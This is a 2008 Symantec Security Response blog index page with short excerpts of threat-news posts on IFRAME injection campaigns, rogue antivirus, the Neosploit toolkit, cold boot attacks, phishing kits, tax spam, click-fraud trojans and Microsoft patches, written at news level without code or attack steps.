Symantec Connect
  • Login
  • Register
  • All of Connect
    • All of Connect
    • Backup and Archiving
    • Endpoint Management & Virtualization
    • Storage and Clustering
    • Security
    • Inside Symantec
    • Vision User Conference
    • Partners
    • Developers
    •  
  • Overview
  • Forums
  • Articles
  • Blogs
  • Downloads
  • Events
  • Videos
  • Groups
  • Ideas

Security ResponseSyndicate content

Login to participate
Audit Your Web Server Lately?
Joji Hamada | March 28, 2008
0 comments

Web servers being hacked is nothing new and Web administrators continue to maintain their servers in the attempt to prevent this from happening. Well, it might a good time for everyone to audit their servers again because we have confirmed yet again another campaign of IFRAME injection attacks today. Earlier this month, we had a similar mass attack as well, making this a popular theme so far this year.

Earlier today, Dancho Danchev, a security consultant, published a blog about another batch of servers getting injected with malicious code and we have confirmed the attack here at Symantec. IFRAME code has been inserted into Web pages on these servers, leading to rogue security software and codec sites, further leading to downloads of Trojan.Zlob variants and dowloaders. These threats ultimately attempt to install misleading applications onto the compromised computers.

Please avoid the IP addresses below, which are hosting the unwanted files, for the time being...

Read more
Tags: Endpoint Protection (AntiVirus), Malicious Code, Security, Security Response
Practical Cold Boot Attacks
Joshua Talbot | March 27, 2008
0 comments

Building on the Cold Boot research that was released in February of 2008, Tom Liston and Sherri Davidoff of Intelguardians presented “Cold Memory Forensics Work Shop” at CanSecWest 2008. When a system is cold booted, research discovered that the supposed volatility of conventional RAM is a half truth. In many cases memory will continue to hold state for seconds and sometimes even minutes after a system has been powered off.

In a Cold Boot attack, an attacker with physical access to a system reboots the computer and dumps the contents of RAM for forensic analysis, recovering sensitive information (passwords, encryption keys, documents etc). In the Cold Memory Forensics Work Shop, Tom and Sherri discussed their findings in leveraging the Cold Boot techniques to harvest information from systems exposed during penetration testing, as well as their work in developing tools that will help quickly identify passwords that were stored in memory. Their goal is to be able retrieve...

Read more
Tags: Endpoint Protection (AntiVirus), Emerging Threats, Security, Security Response
Neosploit Updated with Exploit
Sean Hittel | March 26, 2008
0 comments

Sometime over the recent Easter weekend, an update to the Neosploit Web attack toolkit showed up on DeepSight honeypots. The new Neosploit version is being served mainly from traffic exchange sites, but some mainstream sites, such as those for restaurants, were also serving up the infectious content.

The main addition that was found in the new iteration of Neosploit is the addition of an exploit for the CA BrightStor 'AddColumn()' ListCtrl.ocx ActiveX Control Buffer Overflow Vulnerability. There is no patch available for this vulnerability as of this writing.

The 2008 versions of NAV, NIS, and N360v2 will catch this exploit as “MSIE CA BrightStor ActiveX BO”, although most of the time the new Neosploit version will be detected as the other vulnerabilities exploited by the toolkit: MDAC, NCTAudioFile2, GOM Player, WebViewFolderIcon setSlice(), and Daxctle.OCX KeyFrame.

CA BrightStor 'AddColumn()' ListCtrl.ocx ActiveX Control Buffer Overflow...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
Yet another Site Falls Prey to XP Antivirus
Vikram Thakur | March 25, 2008
0 comments

A couple of weekends ago, I was doing
exactly what most computer users do in their free time. I was sitting
front of the computer, visiting sites that I have no business with. One
site led to another and I eventually started looking for some old
friends I had lost contact with over the years. One such search led me
to Spoke.com, a business networking site. Using the Spoke search box
soon had me believing that my computer might be infected and I would
soon need to scan it for malicious programs. OK, I didn't really
believe it because I was laughing a bit too much, trying to understand
what the "warning" was trying to tell me:



...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Security Risks, Security Response
The Stars See Malicious Code in Your Future
Hannah Chen | March 24, 2008
0 comments

Recently, we observed some suspicious activity on the Chinese Yahoo astrology site, http://astrology.cn.yahoo.com. Upon investigation, we determined that the site in question contained an iframe that was linking to the domain luckty.com, an astrology-based match finding company. This page contained an embedded iframe that linked to a malicious site that was exploiting the Real Player ierpplug.dll ActiveX Control Buffer Overflow Vulnerability and the MSIE ADODB.Stream Object File Installation Weakness to download malicious code onto a compromised machine.

We contacted our friends at Yahoo, who subsequently removed all iframe references pointing to luckty.com. Symantec antivirus products that include Browser Protection, a feature that detects...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
Cloning Shop for Mac Users Now Open!
Alfredo Pesoli | March 21, 2008
0 comments

This week, our friends at Trend blogged
about a new misleading application for the Mac. We decided to take a
look at it as well. The application, named iMunizator, is a variant of
the well known rogue antivirus product called Macsweeper, which we have blogged about previously.



When launched, iMunizator performs a full scan of the system and
soon after it reports the “problems” that it found. Worryingly, some of
the files detected by iMunizator are actually safe system binaries that
should never be removed—files with "app" extensions. See the screenshot
below:



...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Security Risks, Security Response
Recent Apple Security Update
Symantec Security Response | March 21, 2008
0 comments

This sort of news certainly doesn't come around as frequently or on a strict schedule, but it is nonetheless just as important as (for example) Microsoft's well known "Patch Tuesdays." On Tuesday, March 18th, Apple released a comprehensive security update for Mac OS X 10.4.11 and Mac OS X 10.5.2, as well as a security update package for its Safari Web browser. Apple doesn't follow the same monthly release schedule as their best competitor, but that doesn't affect the importance of such a security update.

Since the release of these security updates, we have come across all kinds of news feeds and blogs that refer to it as a patch release. Those writers calling it a "patch release" has of course raised the ire of users and readers alike, with arguments ranging from the size of the downloads to comparisons with Microsoft or Linux updates. Some people have referred to it as a software upgrade, but we must call for calm in the industry. :-) Instead of...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
Another Reason to Patch Microsoft Jet Vulnerabilities
Elia Florio | March 20, 2008
0 comments

Vulnerabilities in Microsoft Access and MSJET40.DLL have been discussed in many blogs recently. Our friends at Panda blogged about a possible (new?) vulnerability of the MS Jet library on March 3rd and McAfee also blogged this past December about a different vulnerability reported on Bugtraq. Here at Symantec we also reported some of these vulnerabilities to Microsoft and also the many targeted attacks carried with .mdb files since March 2006, but this is almost the usual sort of response:

"You appear to be reporting an issue with a file type Microsoft considers to be unsafe. Many programs, such as Internet Explorer and Outlook, automatically block these files. For more information, please visit http://support.microsoft.com/kb/925330"

This sentence translates into a very simple equation: .mdb = .exe...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
Millennial Workforce: IT Risk or Benefit?
Samir Kapuria | March 19, 2008
0 comments

This is an issue I explored in a blog post several months ago, IT Risk and the Millennials, which really seemed to resonate with customers and industry peers. Feedback ranged from "great article," to "how are others addressing this choice vs. control dilemma?" to skepticism about this theory and the desire to see more quantifiable research validating my previous thoughts.

So, with all of this in mind, we did just that. We went out and commissioned a study with Applied Research-West to measure IT risk issues surrounding the emerging millennial workforce within companies. The study was conducted with 600 people, including three groups of 200 respondents each: IT decision makers, millennial workers (born after 1980), and older workforce (born before 1980). Our goal was to measure millennial workers' perceptions...

Read more
Tags: Endpoint Protection (AntiVirus), IT Risk Management, Security, Security Response
38,911 Bytes Free
Marvin Fabuli | March 18, 2008
0 comments

I was thinking about computers the other day, which I'm prone to do on occasion, and I realized that I still harbor fond memories of the Commodore64 that I begged my parents to buy for "the family" back in the early 80s. The Fabuli's had resisted the lure of the Commodore VIC-20 (barely) for a little while, but when my older brother vacated the homestead for university and the city, the modern technology provided by the C64 moved into his empty bedroom. The C64 played a large part in forming the basis of my interest in computing and IT. Coupled with the fact that I had now had unrestricted access to the room that had only weeks previous been OFF-LIMITS, these two factors meant that I now had two brand new worlds to conquer.

Oh. I mentioned the family earlier. Of the thousands of hours of service the Commodore64 provided, my parents might have spent 24 hours on it between them. The rest of the time I was playing games, showing off for my mom using...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Spam, Security Response
Spammers Exploit the Tax Season
Kelly Conley | March 17, 2008
0 comments

As reported in the February State of Spam report, we have observed spammers disguising themselves as the IRS and dangling an offer of a tax refund to unwitting recipients. That is, a refund made available once you input your credit card information into their site. A site that does not bear the IRS URL. A site that is fraudulent and nothing more than a collection tool for credit card and other personal information. And while we are still seeing this, we have recently observed a few new types of spam in relation to tax season. This spam being of a more sinister type as it directs you to download a virus.

In one example, the spammer indicates that a new law requires you to download tax software. Well, that in itself is ridiculous because taxes are traditionally done on paper and there is no...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Spam, Security Response
Phishing for Easter Eggs
Candid Wueest | March 14, 2008
0 comments

There are hundreds of ready-for-use phishing kits available on the Internet. At the beginning of this month, a list with more than 400 links had been circulated on mailing lists and forums. Some kits are a compilation of different sophisticated scripts that can spoof many different brands at once and sometimes even bypass two-factor authentication schemas. However, the vast majority are simply archived copies of the original Web site, modified to include a small PHP script that will send the stolen credentials to an email account.

We know that not all phishers have a Ph.D. in the art of phishing; therefore, you can sometimes find some interesting and funny pieces of code in phishing kits found on the Internet. As Easter is coming up soon, I decided to compile a top five list of the funniest Easter eggs that I have seen in phishing kits lately.

In 5th place: Local image paths
Sometimes, phishers do not check if all links are converted correctly....

Read more
Tags: Endpoint Protection (AntiVirus), Online Fraud, Security, Security Response
Your Friendly Password Archiver
Candid Wueest | March 13, 2008
0 comments

We all know that you should back up your data periodically if you don't want to lose it in the case of an incident. This is not as trivial as it used to be. You might have some information stored remotely in online services. Most likely you will have an online email account and may want to have those emails archived on your local backup drive.

So I wasn't surprised when I saw an article last week on Jeff Atwood's blog about someone searching for a way to archive emails from Gmail. By the way, any IMAP client might be a good way. The sad part of the story was that the guy stumbled on a shareware tool called G-Archiver. After playing around with the software, he discovered that there is a hard-coded Gmail account with a password in this application. After doing some more analysis, it was evident that this tool does not only archive your emails locally, it will...

Read more
Tags: Endpoint Protection (AntiVirus), Security, Security Risks, Security Response
Trojan.Trafbrush: Providing Click Fraud Services to Affiliates
Chen Yu | March 12, 2008
0 comments

My colleague, Takashi Katsuki, posted a blog that describes how Trojan.Farfli provides a service to affiliates, which allows them to increase the number of hits for an affiliate’s tracker. Recently I came across another Trojan, which provides such a service: Trojan.Trafbrush.

When Trojan.Trafbrush is executed, it drops several components and registers a browser helper object (BHO). It then downloads two configuration files from 1.mailhunt.cn. One of the files is config.ini, which contains display options of a...

Read more
Tags: Endpoint Protection (AntiVirus), Online Fraud, Security, Security Response
Microsoft Patch Tuesday for March 2008
Robert Keith | March 11, 2008
0 comments

Hello and welcome to this month’s blog on the Microsoft patch releases. This month, Microsoft will release four bulletins that cover a total of 12 vulnerabilities.

Of those, 11 are rated ‘critical’ and one is rated ‘important’. Two of the critical issues affect Office Web Components and have the potential to be the worst of the bunch. Office Web Components are installed as part of multiple applications. The vulnerabilities affecting them can be triggered by simply visiting a web page with some attacker-controlled content. Seven of the critical issues affect Microsoft Excel and require a victim to open a malicious file to trigger the vulnerability. The remaining issues affect Outlook and Office.

Microsoft’s summary of the March releases can be found here:
http://www.microsoft.com/technet/security/bulletin/ms08-mar.mspx

1....

Read more
Tags: Endpoint Protection (AntiVirus), Security, Vulnerabilities & Exploits, Security Response
  • 1
  • 2
  • next ›
  • last »

About Security Response Blog

Our security research centers around the world provide unparalleled analysis of and protection from malware, security risks, vulnerabilities, and spam.
Filter by:

Blog Tags

10.x 11.x 9.x and Earlier Antivirus2010 Backdoor.Tidserv Brightmail Gateway Emerging Threats Endpoint Encryption Endpoint Protection (AntiVirus) Endpoint Protection Small Business Enterprise Security Manager Evolution of Security General Symantec IT Healthcare Landscape IT Risk Management Internet Security Threat Report Live PC Care Malicious Code Misleading Applications Mobile & Wireless Online Fraud Password Management Restore Security Security Risks Spam Sykipot SymbOS.Exy Symbian Trojan.FakeAV Trojan.Zbot VirusDoctor Vulnerabilities & Exploits Windows Zeus
© 2010
  • Symantec Corporation
  • Contact Us
  • Get RSS
  • Privacy Policy
  • Symantec.com